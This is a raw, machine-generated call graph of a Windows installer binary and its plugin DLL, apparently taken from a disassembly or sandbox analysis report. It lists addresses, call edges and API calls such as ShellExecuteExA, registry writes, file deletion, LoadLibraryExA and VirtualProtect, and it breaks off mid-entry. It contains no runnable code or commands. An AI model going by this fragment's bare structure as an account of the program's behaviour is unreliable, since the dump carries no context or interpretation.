OleUninitialize 4256->4258 4263 405a2c 4257->4263 4293 4060f7 lstrcpynA 4257->4293 4258->3942 4258->3943 4260 405924 4261 405937 4260->4261 4262 40592a lstrcatA 4260->4262 4266 405ad6 2 API calls 4261->4266 4265 40593d 4262->4265 4263->4258 4264 40646b 2 API calls 4263->4264 4267 405a50 4264->4267 4268 40594b lstrcatA 4265->4268 4270 405956 lstrlenA FindFirstFileA 4265->4270 4266->4265 4267->4258 4269 405a54 4267->4269 4268->4270 4271 405a8f 3 API calls 4269->4271 4270->4263 4281 40597a 4270->4281 4272 405a5a 4271->4272 4274 405877 5 API calls 4272->4274 4273 405aba CharNextA 4273->4281 4275 405a66 4274->4275 4276 405a80 4275->4276 4277 405a6a 4275->4277 4280 40521e 24 API calls 4276->4280 4277->4258 4283 40521e 24 API calls 4277->4283 4278 405a0b FindNextFileA 4278->4281 4282 405a23 FindClose 4278->4282 4280->4258 4281->4273 4281->4278 4289 4059cc 4281->4289 4294 4060f7 lstrcpynA 4281->4294 4282->4263 4284 405a77 4283->4284 4285 405ed6 36 API calls 4284->4285 4288 405a7e 4285->4288 4287 4058bf 60 API calls 4287->4289 4288->4258 4289->4278 4289->4287 4290 40521e 24 API calls 4289->4290 4291 40521e 24 API calls 4289->4291 4292 405ed6 36 API calls 4289->4292 4295 405877 4289->4295 4290->4278 4291->4289 4292->4289 4293->4260 4294->4281 4303 405c6b GetFileAttributesA 4295->4303 4297 4058a4 4297->4289 4299 405892 RemoveDirectoryA 4301 4058a0 4299->4301 4300 40589a DeleteFileA 4300->4301 4301->4297 4302 4058b0 SetFileAttributesA 4301->4302 4302->4297 4304 405883 4303->4304 4305 405c7d SetFileAttributesA 4303->4305 4304->4297 4304->4299 4304->4300 4305->4304 4307 405db2 GetShortPathNameA 4306->4307 4308 405d8c 4306->4308 4309 405ed1 4307->4309 4310 405dc7 4307->4310 4333 405c90 GetFileAttributesA CreateFileA 4308->4333 4309->4138 4310->4309 4313 405dcf wsprintfA 4310->4313 4312 405d96 CloseHandle GetShortPathNameA 4312->4309 4314 405daa 4312->4314 4315 40618a 17 API calls 4313->4315 4314->4307 4314->4309 4316 405df7 4315->4316 4334 405c90 GetFileAttributesA CreateFileA 4316->4334 4318 405e04 4318->4309 4319 405e13 GetFileSize GlobalAlloc 4318->4319 4320 405e35 4319->4320 4321 405eca CloseHandle 4319->4321 4322 405d08 ReadFile 4320->4322 4321->4309 4323 405e3d 4322->4323 4323->4321 4335 405bf5 lstrlenA 4323->4335 4326 405e54 lstrcpyA 4329 405e76 4326->4329 4327 405e68 4328 405bf5 4 API calls 4327->4328 4328->4329 4330 405ead SetFilePointer 4329->4330 4331 405d37 WriteFile 4330->4331 4332 405ec3 GlobalFree 4331->4332 4332->4321 4333->4312 4334->4318 4336 405c36 lstrlenA 4335->4336 4337 405c3e 4336->4337 4338 405c0f lstrcmpiA 4336->4338 4337->4326 4337->4327 4338->4337 4339 405c2d CharNextA 4338->4339 4339->4336 4862 4038c8 4863 4038d3 4862->4863 4864 4038d7 4863->4864 4865 4038da GlobalAlloc 4863->4865 4865->4864 4869 401fcb 4870 402bce 17 API calls 4869->4870 4871 401fd2 4870->4871 4872 40646b 2 API calls 4871->4872 4873 401fd8 4872->4873 4875 401fea 4873->4875 4876 406055 wsprintfA 4873->4876 4876->4875 4877 700e1000 4880 700e101b 4877->4880 4887 700e14bb 4880->4887 4882 700e1020 4883 700e1027 GlobalAlloc 4882->4883 4884 700e1024 4882->4884 4883->4884 4885 700e14e2 3 API calls 4884->4885 4886 700e1019 4885->4886 4888 700e14c1 4887->4888 4889 700e14c7 4888->4889 4890 700e14d3 GlobalFree 4888->4890 4889->4882 4890->4882 4891 402a53 InvalidateRect 4892 402a5a 4891->4892 4361 4014d6 4362 402bac 17 API calls 4361->4362 4363 4014dc Sleep 4362->4363 4365 402a5a 4363->4365 4378 401759 4379 402bce 17 API calls 4378->4379 4380 401760 4379->4380 4381 401786 4380->4381 4382 40177e 4380->4382 4419 4060f7 lstrcpynA 4381->4419 4418 4060f7 lstrcpynA 4382->4418 4385 401784 4388 4063d2 5 API calls 4385->4388 4386 401791 4387 405a8f 3 API calls 4386->4387 4389 401797 lstrcatA 4387->4389 4397 4017a3 4388->4397 4389->4385 4390 40646b 2 API calls 4390->4397 4391 4017e4 4392 405c6b 2 API calls 4391->4392 4392->4397 4394 4017ba CompareFileTime 4394->4397 4395 40187e 4396 40521e 24 API calls 4395->4396 4399 401888 4396->4399 4397->4390 4397->4391 4397->4394 4397->4395 4398 4060f7 lstrcpynA 4397->4398 4405 40618a 17 API calls 4397->4405 4413 405813 MessageBoxIndirectA 4397->4413 4416 401855 4397->4416 4417 405c90 GetFileAttributesA CreateFileA 4397->4417 4398->4397 4401 4030d8 31 API calls 4399->4401 4400 40521e 24 API calls 4404 40186a 4400->4404 4402 40189b 4401->4402 4403 4018af SetFileTime 4402->4403 4406 4018c1 CloseHandle 4402->4406 4403->4406 4405->4397 4406->4404 4407 4018d2 4406->4407 4408 4018d7 4407->4408 4409 4018ea 4407->4409 4410 40618a 17 API calls 4408->4410 4411 40618a 17 API calls 4409->4411 4414 4018df lstrcatA 4410->4414 4412 4018f2 4411->4412 4412->4404 4415 405813 MessageBoxIndirectA 4412->4415 4413->4397 4414->4412 4415->4404 4416->4400 4416->4404 4417->4397 4418->4385 4419->4386 4893 401959 4894 402bac 17 API calls 4893->4894 4895 401960 4894->4895 4896 402bac 17 API calls 4895->4896 4897 40196d 4896->4897 4898 402bce 17 API calls 4897->4898 4899 401984 lstrlenA 4898->4899 4901 401994 4899->4901 4900 4019d4 4901->4900 4905 4060f7 lstrcpynA 4901->4905 4903 4019c4 4903->4900 4904 4019c9 lstrlenA 4903->4904 4904->4900 4905->4903 4906 40535c 4907 405507 4906->4907 4908 40537e GetDlgItem GetDlgItem GetDlgItem 4906->4908 4910 405537 4907->4910 4911 40550f GetDlgItem CreateThread CloseHandle 4907->4911 4951 4041b0 SendMessageA 4908->4951 4913 405565 4910->4913 4914 405586 4910->4914 4915 40554d ShowWindow ShowWindow 4910->4915 4911->4910 4912 4053ee 4919 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4912->4919 4916 405575 4913->4916 4917 405599 ShowWindow 4913->4917 4920 4055c0 4913->4920 4918 4041e2 8 API calls 4914->4918 4953 4041b0 SendMessageA 4915->4953 4954 404154 4916->4954 4924 4055b9 4917->4924 4925 4055ab 4917->4925 4923 405592 4918->4923 4926 405463 4919->4926 4927 405447 SendMessageA SendMessageA 4919->4927 4920->4914 4928 4055cd SendMessageA 4920->4928 4930 404154 SendMessageA 4924->4930 4929 40521e 24 API calls 4925->4929 4931 405476 4926->4931 4932 405468 SendMessageA 4926->4932 4927->4926 4928->4923 4933 4055e6 CreatePopupMenu 4928->4933 4929->4924 4930->4920 4935 40417b 18 API calls 4931->4935 4932->4931 4934 40618a 17 API calls 4933->4934 4936 4055f6 AppendMenuA 4934->4936 4937 405486 4935->4937 4938 405614 GetWindowRect 4936->4938 4939 405627 TrackPopupMenu 4936->4939 4940 4054c3 GetDlgItem SendMessageA 4937->4940 4941 40548f ShowWindow 4937->4941 4938->4939 4939->4923 4942 405643 4939->4942 4940->4923 4945 4054ea SendMessageA SendMessageA 4940->4945 4943 4054b2 4941->4943 4944 4054a5 ShowWindow 4941->4944 4946 405662 SendMessageA 4942->4946 4952 4041b0 SendMessageA 4943->4952 4944->4943 4945->4923 4946->4946 4947 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4946->4947 4949 4056a1 SendMessageA 4947->4949 4949->4949 4950 4056c3 GlobalUnlock SetClipboardData CloseClipboard 4949->4950 4950->4923 4951->4912 4952->4940 4953->4913 4955 404161 SendMessageA 4954->4955 4956 40415b 4954->4956 4955->4914 4956->4955 4957 40275d 4958 402763 4957->4958 4959 402a5a 4958->4959 4960 40276b FindClose 4958->4960 4960->4959 4961 401a5e 4962 402bac 17 API calls 4961->4962 4963 401a67 4962->4963 4964 402bac 17 API calls 4963->4964 4965 401a0e 4964->4965 4966 40495e 4967 40498a 4966->4967 4968 40496e 4966->4968 4970 404990 SHGetPathFromIDListA 4967->4970 4971 4049bd 4967->4971 4977 4057f7 GetDlgItemTextA 4968->4977 4973 4049a0 4970->4973 4974 4049a7 SendMessageA 4970->4974 4972 40497b SendMessageA 4972->4967 4975 40140b 2 API calls 4973->4975 4974->4971 4975->4974 4977->4972 4978 4029de 4979 406500 5 API calls 4978->4979 4980 4029e5 4979->4980 4981 402bce 17 API calls 4980->4981 4982 4029ee 4981->4982 4983 402a2a 4982->4983 4988 40614a 4982->4988 4985 4029fc 4985->4983 4992 406134 4985->4992 4989 406155 4988->4989 4990 406178 IIDFromString 4989->4990 4991 406171 4989->4991 4990->4985 4991->4985 4995 406119 WideCharToMultiByte 4992->4995 4994 402a1d CoTaskMemFree 4994->4983 4995->4994 4996 4028df 4997 4028e2 4996->4997 4998 402925 4997->4998 4999 40290e 4997->4999 5005 4027bf 4997->5005 5002 40293f 4998->5002 5003 40292f 4998->5003 5000 402922 4999->5000 5001 402913 4999->5001 5010 406055 wsprintfA 5000->5010 5009 4060f7 lstrcpynA 5001->5009 5004 40618a 17 API calls 5002->5004 5006 402bac 17 API calls 5003->5006 5004->5005 5006->5005 5009->5005 5010->5005 4626 4023e0 4627 402bce 17 API calls 4626->4627 4628 4023f1 4627->4628 4629 402bce 17 API calls 4628->4629 4630 4023fa 4629->4630 4631 402bce 17 API calls 4630->4631 4632 402404 GetPrivateProfileStringA 4631->4632 5011 401b63 5012 402bce 17 API calls 5011->5012 5013 401b6a 5012->5013 5014 402bac 17 API calls 5013->5014 5015 401b73 wsprintfA 5014->5015 5016 402a5a 5015->5016 5017 401d65 5018 401d78 GetDlgItem 5017->5018 5019 401d6b 5017->5019 5021 401d72 5018->5021 5020 402bac 17 API calls 5019->5020 5020->5021 5022 401db9 GetClientRect LoadImageA SendMessageA 5021->5022 5023 402bce 17 API calls 5021->5023 5025 401e1a 5022->5025 5027 401e26 5022->5027 5023->5022 5026 401e1f DeleteObject 5025->5026 5025->5027 5026->5027 5028 4042e6 5029 4042fc 5028->5029 5031 404408 5028->5031 5032 40417b 18 API calls 5029->5032 5030 404477 5033 404541 5030->5033 5034 404481 GetDlgItem 5030->5034 5031->5030 5031->5033 5039 40444c GetDlgItem SendMessageA 5031->5039 5037 404352 5032->5037 5038 4041e2 8 API calls 5033->5038 5035 404497 5034->5035 5036 4044ff 5034->5036 5035->5036 5042 4044bd SendMessageA LoadCursorA SetCursor 5035->5042 5036->5033 5043 404511 5036->5043 5040 40417b 18 API calls 5037->5040 5041 40453c 5038->5041 5061 40419d EnableWindow 5039->5061 5045 40435f CheckDlgButton 5040->5045 5065 40458a 5042->5065 5048 404517 SendMessageA 5043->5048 5049 404528 5043->5049 5059 40419d EnableWindow 5045->5059 5048->5049 5049->5041 5053 40452e SendMessageA 5049->5053 5050 404472 5062 404566 5050->5062 5051 40437d GetDlgItem 5060 4041b0 SendMessageA 5051->5060 5053->5041 5056 404393 SendMessageA 5057 4043b1 GetSysColor 5056->5057 5058 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5056->5058 5057->5058 5058->5041 5059->5051 5060->5056 5061->5050 5063 404574 5062->5063 5064 404579 SendMessageA 5062->5064 5063->5064 5064->5030 5068 4057d9 ShellExecuteExA 5065->5068 5067 4044f0 LoadCursorA SetCursor 5067->5036 5068->5067 4674 40166a 4675 402bce 17 API calls 4674->4675 4676 401671 4675->4676 4677 402bce 17 API calls 4676->4677 4678 40167a 4677->4678 4679 402bce 17 API calls 4678->4679 4680 401683 MoveFileA 4679->4680 4681 401696 4680->4681 4682 40168f 4680->4682 4683 40646b 2 API calls 4681->4683 4686 4022e2 4681->4686 4684 401423 24 API calls 4682->4684 4685 4016a5 4683->4685 4684->4686 4685->4686 4687 405ed6 36 API calls 4685->4687 4687->4682 4688 40216b 4689 402bce 17 API calls 4688->4689 4690 402172 4689->4690 4691 402bce 17 API calls 4690->4691 4692 40217c 4691->4692 4693 402bce 17 API calls 4692->4693 4694 402186 4693->4694 4695 402bce 17 API calls 4694->4695 4696 402193 4695->4696 4697 402bce 17 API calls 4696->4697 4698 40219d 4697->4698 4699 4021df CoCreateInstance 4698->4699 4700 402bce 17 API calls 4698->4700 4703 4021fe 4699->4703 4705 4022ac 4699->4705 4700->4699 4701 401423 24 API calls 4702 4022e2 4701->4702 4704 40228c MultiByteToWideChar 4703->4704 4703->4705 4704->4705 4705->4701 4705->4702 5069 4022eb 5070 402bce 17 API calls 5069->5070 5071 4022f1 5070->5071 5072 402bce 17 API calls 5071->5072 5073 4022fa 5072->5073 5074 402bce 17 API calls 5073->5074 5075 402303 5074->5075 5076 40646b 2 API calls 5075->5076 5077 40230c 5076->5077 5078 40231d lstrlenA lstrlenA 5077->5078 5082 402310 5077->5082 5079 40521e 24 API calls 5078->5079 5081 402359 SHFileOperationA 5079->5081 5080 40521e 24 API calls 5083 402318 5080->5083 5081->5082 5081->5083 5082->5080 5082->5083 4715 40266d 4716 402bac 17 API calls 4715->4716 4721 402677 4716->4721 4717 4026e5 4718 405d08 ReadFile 4718->4721 4719 4026e7 4724 406055 wsprintfA 4719->4724 4720 4026f7 4720->4717 4723 40270d SetFilePointer 4720->4723 4721->4717 4721->4718 4721->4719 4721->4720 4723->4717 4724->4717 5084 40236d 5085 402374 5084->5085 5088 402387 5084->5088 5086 40618a 17 API calls 5085->5086 5087 402381 5086->5087 5087->5088 5089 405813 MessageBoxIndirectA 5087->5089 5089->5088 5090 4019ed 5091 402bce 17 API calls 5090->5091 5092 4019f4 5091->5092 5093 402bce 17 API calls 5092->5093 5094 4019fd 5093->5094 5095 401a04 lstrcmpiA 5094->5095 5096 401a16 lstrcmpA 5094->5096 5097 401a0a 5095->5097 5096->5097 5098 40296e 5099 402bac 17 API calls 5098->5099 5100 402974 5099->5100 5101 4029af 5100->5101 5102 4027bf 5100->5102 5104 402986 5100->5104 5101->5102 5103 40618a 17 API calls 5101->5103 5103->5102 5104->5102 5106 406055 wsprintfA 5104->5106 5106->5102 4747 700e2921 4748 700e2971 4747->4748 4749 700e2931 VirtualProtect 4747->4749 4749->4748 5107 700e103d 5108 700e101b 5 API calls 5107->5108 5109 700e1056 5108->5109 5110 4014f4 SetForegroundWindow 5111 402a5a 5110->5111 4764 402476 4765 402bce 17 API calls 4764->4765 4766 402488 4765->4766 4767 402bce 17 API calls 4766->4767 4768 402492 4767->4768 4781 402c5e 4768->4781 4771 402a5a 4772 4024c7 4773 4024d3 4772->4773 4775 402bac 17 API calls 4772->4775 4776 4024f5 RegSetValueExA 4773->4776 4778 4030d8 31 API calls 4773->4778 4774 402bce 17 API calls 4777 4024c0 lstrlenA 4774->4777 4775->4773 4779 40250b RegCloseKey 4776->4779 4777->4772 4778->4776 4779->4771 4782 402c79 4781->4782 4785 405fab 4782->4785 4786 405fba 4785->4786 4787 4024a2 4786->4787 4788 405fc5 RegCreateKeyExA 4786->4788 4787->4771 4787->4772 4787->4774 4788->4787 5112 700e1638 5113 700e1667 5112->5113 5114 700e1a98 18 API calls 5113->5114 5115 700e166e 5114->5115 5116 700e1675 5115->5116 5117 700e1681 5115->5117 5118 700e1266 2 API calls 5116->5118 5119 700e168b 5117->5119 5120 700e16a8 5117->5120 5121 700e167f 5118->5121 5122 700e14e2 3 API calls 5119->5122 5123 700e16ae 5120->5123 5124 700e16d2 5120->5124 5126 700e1690 5122->5126 5127 700e1559 3 API calls 5123->5127 5125 700e14e2 3 API calls 5124->5125 5125->5121 5128 700e1559 3 API calls 5126->5128 5129 700e16b3 5127->5129 5130 700e1696 5128->5130 5131 700e1266 2 API calls 5129->5131 5132 700e1266 2 API calls 5130->5132 5133 700e16b9 GlobalFree 5131->5133 5135 700e169c GlobalFree 5132->5135 5133->5121 5134 700e16cd GlobalFree 5133->5134 5134->5121 5135->5121 5136 402777 5137 40277d 5136->5137 5138 402781 FindNextFileA 5137->5138 5141 402793 5137->5141 5139 4027d2 5138->5139 5138->5141 5142 4060f7 lstrcpynA 5139->5142 5142->5141 5143 700e1837 5144 700e185a 5143->5144 5145 700e188a GlobalFree 5144->5145 5146 700e189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5144->5146 5145->5146 5147 700e1266 2 API calls 5146->5147 5148 700e1a1e GlobalFree GlobalFree 5147->5148 5149 401ef9 5150 402bce 17 API calls 5149->5150 5151 401eff 5150->5151 5152 402bce 17 API calls 5151->5152 5153 401f08 5152->5153 5154 402bce 17 API calls 5153->5154 5155 401f11 5154->5155 5156 402bce 17 API calls 5155->5156 5157 401f1a 5156->5157 5158 401423 24 API calls 5157->5158 5159 401f21 5158->5159 5166 4057d9 ShellExecuteExA 5159->5166 5161 401f5c 5162 406575 5 API calls 5161->5162 5163 4027bf 5161->5163 5164 401f76 CloseHandle 5162->5164 5164->5163 5166->5161 4789 401f7b 4790 402bce 17 API calls 4789->4790 4791 401f81 4790->4791 4792 40521e 24 API calls 4791->4792 4793 401f8b 4792->4793 4794 405796 2 API calls 4793->4794 4795 401f91 4794->4795 4799 4027bf 4795->4799 4803 401fb2 CloseHandle 4795->4803 4804 406575 WaitForSingleObject 4795->4804 4798 401fa6 4800 401fb4 4798->4800 4801 401fab 4798->4801 4800->4803 4809 406055 wsprintfA 4801->4809 4803->4799 4805 40658f 4804->4805 4806 4065a1 GetExitCodeProcess 4805->4806 4807 40653c 2 API calls 4805->4807 4806->4798 4808 406596 WaitForSingleObject 4807->4808 4808->4805 4809->4803 5167 401ffb 5168 402bce 17 API calls 5167->5168 5169 402002 5168->5169 5170 406500 5 API calls 5169->5170 5171 402011 5170->5171 5172 402029 GlobalAlloc 5171->5172 5173 402091 5171->5173 5172->5173 5174 40203d 5172->5174 5175 406500 5 API calls 5174->5175 5176 402044 5175->5176 5177 406500 5 API calls 5176->5177 5178 40204e 5177->5178 5178->5173 5182 406055 wsprintfA 5178->5182 5180 402085 5183 406055 wsprintfA 5180->5183 5182->5180 5183->5173 5184 4018fd 5185 401934 5184->5185 5186 402bce 17 API calls 5185->5186 5187 401939 5186->5187 5188 4058bf 67 API calls 5187->5188 5189 401942 5188->5189 5190 401000 5191 401037 BeginPaint GetClientRect 5190->5191 5192 40100c DefWindowProcA 5190->5192 5194 4010f3 5191->5194 5195 401179 5192->5195 5196 401073 CreateBrushIndirect FillRect DeleteObject 5194->5196 5197 4010fc 5194->5197 5196->5194 5198 401102 CreateFontIndirectA 5197->5198 5199 401167 EndPaint 5197->5199 5198->5199 5200 401112 6 API calls 5198->5200 5199->5195 5200->5199 5201 401900 5202 402bce 17 API calls 5201->5202 5203 401907 5202->5203 5204 405813 MessageBoxIndirectA 5203->5204 5205 401910 5204->5205 5206 404b80 GetDlgItem GetDlgItem 5207 404bd6 7 API calls 5206->5207 5213 404dfd 5206->5213 5208 404c72 SendMessageA 5207->5208 5209 404c7e DeleteObject 5207->5209 5208->5209 5210 404c89 5209->5210 5212 404cc0 5210->5212 5214 40618a 17 API calls 5210->5214 5211 404edf 5216 404f8b 5211->5216 5226 404f38 SendMessageA 5211->5226 5249 404df0 5211->5249 5215 40417b 18 API calls 5212->5215 5213->5211 5241 404e6c 5213->5241 5260 404ace SendMessageA 5213->5260 5219 404ca2 SendMessageA SendMessageA 5214->5219 5220 404cd4 5215->5220 5217 404f95 SendMessageA 5216->5217 5218 404f9d 5216->5218 5217->5218 5223 404fc6 5218->5223 5229 404fb6 5218->5229 5230 404faf ImageList_Destroy 5218->5230 5219->5210 5225 40417b 18 API calls 5220->5225 5221 404ed1 SendMessageA 5221->5211 5222 4041e2 8 API calls 5228 40518b 5222->5228 5231 40513f 5223->5231 5252 405001 5223->5252 5265 404b4e 5223->5265 5239 404ce5 5225->5239 5227 404f4d SendMessageA 5226->5227 5226->5249 5234 404f60 5227->5234 5229->5223 5232 404fbf GlobalFree 5229->5232 5230->5229 5235 405151 ShowWindow GetDlgItem ShowWindow 5231->5235 5231->5249 5232->5223 5233 404dbf GetWindowLongA SetWindowLongA 5236 404dd8 5233->5236 5242 404f71 SendMessageA 5234->5242 5235->5249 5237 404df5 5236->5237 5238 404ddd ShowWindow 5236->5238 5259 4041b0 SendMessageA 5237->5259 5258 4041b0 SendMessageA 5238->5258 5239->5233 5240 404d37 SendMessageA 5239->5240 5243 404dba 5239->5243 5246 404d75 SendMessageA 5239->5246 5247 404d89 SendMessageA 5239->5247 5240->5239 5241->5211 5241->5221 5242->5216 5243->5233 5243->5236 5246->5239 5247->5239 5249->5222 5250 40510b 5251 405115 InvalidateRect 5250->5251 5254 405121 5250->5254 5251->5254 5253 40502f SendMessageA 5252->5253 5257 405045 5252->5257 5253->5257 5254->5231 5274 404a89 5254->5274 5256 4050b9 SendMessageA SendMessageA 5256->5257 5257->5250 5257->5256 5258->5249 5259->5213 5261 404af1 GetMessagePos ScreenToClient SendMessageA 5260->5261 5262 404b2d SendMessageA 5260->5262 5263 404b25 5261->5263 5264 404b2a 5261->5264 5262->5263 5263->5241 5264->5262 5277 4060f7 lstrcpynA 5265->5277 5267 404b61 5278 406055 wsprintfA 5267->5278 5269 404b6b 5270 40140b 2 API calls 5269->5270 5271 404b74 5270->5271 5279 4060f7 lstrcpynA 5271->5279 5273 404b7b 5273->5252 5280 4049c4 5274->5280 5276 404a9e 5276->5231 5277->5267 5278->5269 5279->5273 5281 4049da 5280->5281 5282 40618a 17 API calls 5281->5282 5283 404a3e 5282->5283 5284 40618a 17 API calls 5283->5284 5285 404a49 5284->5285 5286 40618a 17 API calls 5285->5286 5287 404a5f lstrlenA wsprintfA SetDlgItemTextA 5286->5287 5287->5276 5288 401502 5289 40150a 5288->5289 5291 40151d 5288->5291 5290 402bac 17 API calls 5289->5290 5290->5291 5292 402604 5293 402bce 17 API calls 5292->5293 5294 40260b 5293->5294 5297 405c90 GetFileAttributesA CreateFileA 5294->5297 5296 402617 5297->5296 5298 401b87 5299 401b94 5298->5299 5300 401bd8 5298->5300 5303 401c1c 5299->5303 5306 401bab 5299->5306 5301 401c01 GlobalAlloc 5300->5301 5302 401bdc 5300->5302 5305 40618a 17 API calls 5301->5305 5312 402387 5302->5312 5319 4060f7 lstrcpynA 5302->5319 5304 40618a 17 API calls 5303->5304 5303->5312 5308 402381 5304->5308 5305->5303 5317 4060f7 lstrcpynA 5306->5317 5308->5312 5313 405813 MessageBoxIndirectA 5308->5313 5310 401bee GlobalFree 5310->5312 5311 401bba 5318 4060f7 lstrcpynA 5311->5318 5313->5312 5315 401bc9 5320 4060f7 lstrcpynA 5315->5320 5317->5311 5318->5315 5319->5310 5320->5312 4340 402588 4352 402c0e 4340->4352 4343 402bac 17 API calls 4344 40259b 4343->4344 4345 4025a9 4344->4345 4350 4027bf 4344->4350 4346 4025c2 RegEnumValueA 4345->4346 4347 4025b6 RegEnumKeyA 4345->4347 4348 4025de RegCloseKey 4346->4348 4349 4025d7 4346->4349 4347->4348 4348->4350 4349->4348 4353 402bce 17 API calls 4352->4353 4354 402c25 4353->4354 4355 405f7d RegOpenKeyExA 4354->4355 4356 402592 4355->4356 4356->4343 4357 401389 4359 401390 4357->4359 4358 4013fe 4359->4358 4360 4013cb MulDiv SendMessageA 4359->4360 4360->4359 5321 40460d 5322 404639 5321->5322 5323 40464a 5321->5323 5382 4057f7 GetDlgItemTextA 5322->5382 5325 404656 GetDlgItem 5323->5325 5357 4046b5 5323->5357 5327 40466a 5325->5327 5326 404644 5329 4063d2 5 API calls 5326->5329 5330 40467e SetWindowTextA 5327->5330 5337 405b28 4 API calls 5327->5337 5328 404799 5331 404943 5328->5331 5384 4057f7 GetDlgItemTextA 5328->5384 5329->5323 5333 40417b 18 API calls 5330->5333 5336 4041e2 8 API calls 5331->5336 5338 40469a 5333->5338 5334 40618a 17 API calls 5339 404729 SHBrowseForFolderA 5334->5339 5335 4047c9 5340 405b7d 18 API calls 5335->5340 5341 404957 5336->5341 5342 404674 5337->5342 5343 40417b 18 API calls 5338->5343 5339->5328 5344 404741 CoTaskMemFree 5339->5344 5345 4047cf 5340->5345 5342->5330 5348 405a8f 3 API calls 5342->5348 5346 4046a8 5343->5346 5347 405a8f 3 API calls 5344->5347 5385 4060f7 lstrcpynA 5345->5385 5383 4041b0 SendMessageA 5346->5383 5350 40474e 5347->5350 5348->5330 5353 404785 SetDlgItemTextA 5350->5353 5358 40618a 17 API calls 5350->5358 5352 4046ae 5355 406500 5 API calls 5352->5355 5353->5328 5354 4047e6 5356 406500 5 API calls 5354->5356 5355->5357 5365 4047ed 5356->5365 5357->5328 5357->5331 5357->5334 5359 40476d lstrcmpiA 5358->5359 5359->5353 5362 40477e lstrcatA 5359->5362 5360 404829 5386 4060f7 lstrcpynA 5360->5386 5362->5353 5363 404830 5364 405b28 4 API calls 5363->5364 5366 404836 GetDiskFreeSpaceA 5364->5366 5365->5360 5368 405ad6 2 API calls 5365->5368 5370 404881 5365->5370 5369 40485a MulDiv 5366->5369 5366->5370 5368->5365 5369->5370 5371 4048f2 5370->5371 5372 404a89 20 API calls 5370->5372 5373 404915 5371->5373 5375 40140b 2 API calls 5371->5375 5374 4048df 5372->5374 5387 40419d EnableWindow 5373->5387 5377 4048f4 SetDlgItemTextA 5374->5377 5378 4048e4 5374->5378 5375->5373 5377->5371 5380 4049c4 20 API calls 5378->5380 5379 404931 5379->5331 5381 404566 SendMessageA 5379->5381 5380->5371 5381->5331 5382->5326 5383->5352 5384->5335 5385->5354 5386->5363 5387->5379 5388 401490 5389 40521e 24 API calls 5388->5389 5390 401497 5389->5390 5391 405192 5392 4051a2 5391->5392 5393 4051b6 5391->5393 5395 4051ff 5392->5395 5396 4051a8 5392->5396 5394 4051be IsWindowVisible 5393->5394 5402 4051d5 5393->5402 5394->5395 5398 4051cb 5394->5398 5399 405204 CallWindowProcA 5395->5399 5397 4041c7 SendMessageA 5396->5397 5400 4051b2 5397->5400 5401 404ace 5 API calls 5398->5401 5399->5400 5401->5402 5402->5399 5403 404b4e 4 API calls 5402->5403 5403->5395 5404 700e225a 5405 700e22c4 5404->5405 5406 700e22cf GlobalAlloc 5405->5406 5407 700e22ee 5405->5407 5406->5405 4366 402516 4367 402c0e 17 API calls 4366->4367 4368 402520 4367->4368 4369 402bce 17 API calls 4368->4369 4370 402529 4369->4370 4371 402533 RegQueryValueExA 4370->4371 4374 4027bf 4370->4374 4372 402559 RegCloseKey 4371->4372 4373 402553 4371->4373 4372->4374 4373->4372 4377 406055 wsprintfA 4373->4377 4377->4372 5408 700e1058 5410 700e1074 5408->5410 5409 700e10dc 5410->5409 5411 700e1091 5410->5411 5412 700e14bb GlobalFree 5410->5412 5413 700e14bb GlobalFree 5411->5413 5412->5411 5414 700e10a1 5413->5414 5415 700e10a8 GlobalSize 5414->5415 5416 700e10b1 5414->5416 5415->5416 5417 700e10c6 5416->5417 5418 700e10b5 GlobalAlloc 5416->5418 5420 700e10d1 GlobalFree 5417->5420 5419 700e14e2 3 API calls 5418->5419 5419->5417 5420->5409 4420 40239c 4421 4023a4 4420->4421 4424 4023aa 4420->4424 4422 402bce 17 API calls 4421->4422 4422->4424 4423 4023ba 4426 4023c8 4423->4426 4428 402bce 17 API calls 4423->4428 4424->4423 4425 402bce 17 API calls 4424->4425 4425->4423 4427 402bce 17 API calls 4426->4427 4429 4023d1 WritePrivateProfileStringA 4427->4429 4428->4426 4430 40209d 4431 4020af 4430->4431 4440 40215d 4430->4440 4432 402bce 17 API calls 4431->4432 4433 4020b6 4432->4433 4435 402bce 17 API calls 4433->4435 4434 401423 24 API calls 4441 4022e2 4434->4441 4436 4020bf 4435->4436 4437 4020d4 LoadLibraryExA 4436->4437 4438 4020c7 GetModuleHandleA 4436->4438 4439 4020e4 GetProcAddress 4437->4439 4437->4440 4438->4437 4438->4439 4442 402130 4439->4442 4443 4020f3 4439->4443 4440->4434 4444 40521e 24 API calls 4442->4444 4445 402112 4443->4445 4446 4020fb 4443->4446 4447 402103 4444->4447 4451 700e16db 4445->4451 4493 401423 4446->4493 4447->4441 4449 402151 FreeLibrary 4447->4449 4449->4441 4452 700e170b 4451->4452 4496 700e1a98 4452->4496 4454 700e1712 4455 700e1834 4454->4455 4456 700e172a 4454->4456 4457 700e1723 4454->4457 4455->4447 4528 700e22f1 4456->4528 4545 700e22af 4457->4545 4462 700e174f 4464 700e178e 4462->4464 4465 700e1770 4462->4465 4463 700e1740 4467 700e1746 4463->4467 4472 700e1751 4463->4472 4468 700e17dc 4464->4468 4469 700e1794 4464->4469 4558 700e24d8 4465->4558 4467->4462 4539 700e2a38 4467->4539 4476 700e24d8 11 API calls 4468->4476 4577 700e156b 4469->4577 4470 700e1759 4470->4462 4555 700e2cc3 4470->4555 4471 700e1776 4569 700e1559 4471->4569 4549 700e26b2 4472->4549 4480 700e17cd 4476->4480 4484 700e1823 4480->4484 4583 700e249e 4480->4583 4482 700e1757 4482->4462 4483 700e24d8 11 API calls 4483->4480 4484->4455 4488 700e182d GlobalFree 4484->4488 4488->4455 4490 700e180f 4490->4484 4587 700e14e2 wsprintfA 4490->4587 4491 700e1808 FreeLibrary 4491->4490 4494 40521e 24 API calls 4493->4494 4495 401431 4494->4495 4495->4447 4590 700e1215 GlobalAlloc 4496->4590 4498 700e1abf 4591 700e1215 GlobalAlloc 4498->4591 4500 700e1d00 GlobalFree GlobalFree GlobalFree 4501 700e1d1d 4500->4501 4517 700e1d67 4500->4517 4504 700e20f1 4501->4504 4513 700e1d32 4501->4513 4501->4517 4502 700e1aca 4502->4500 4503 700e1bbd GlobalAlloc 4502->4503 4505 700e2033 4502->4505 4507 700e1c08 lstrcpyA 4502->4507 4508 700e1c26 GlobalFree 4502->4508 4512 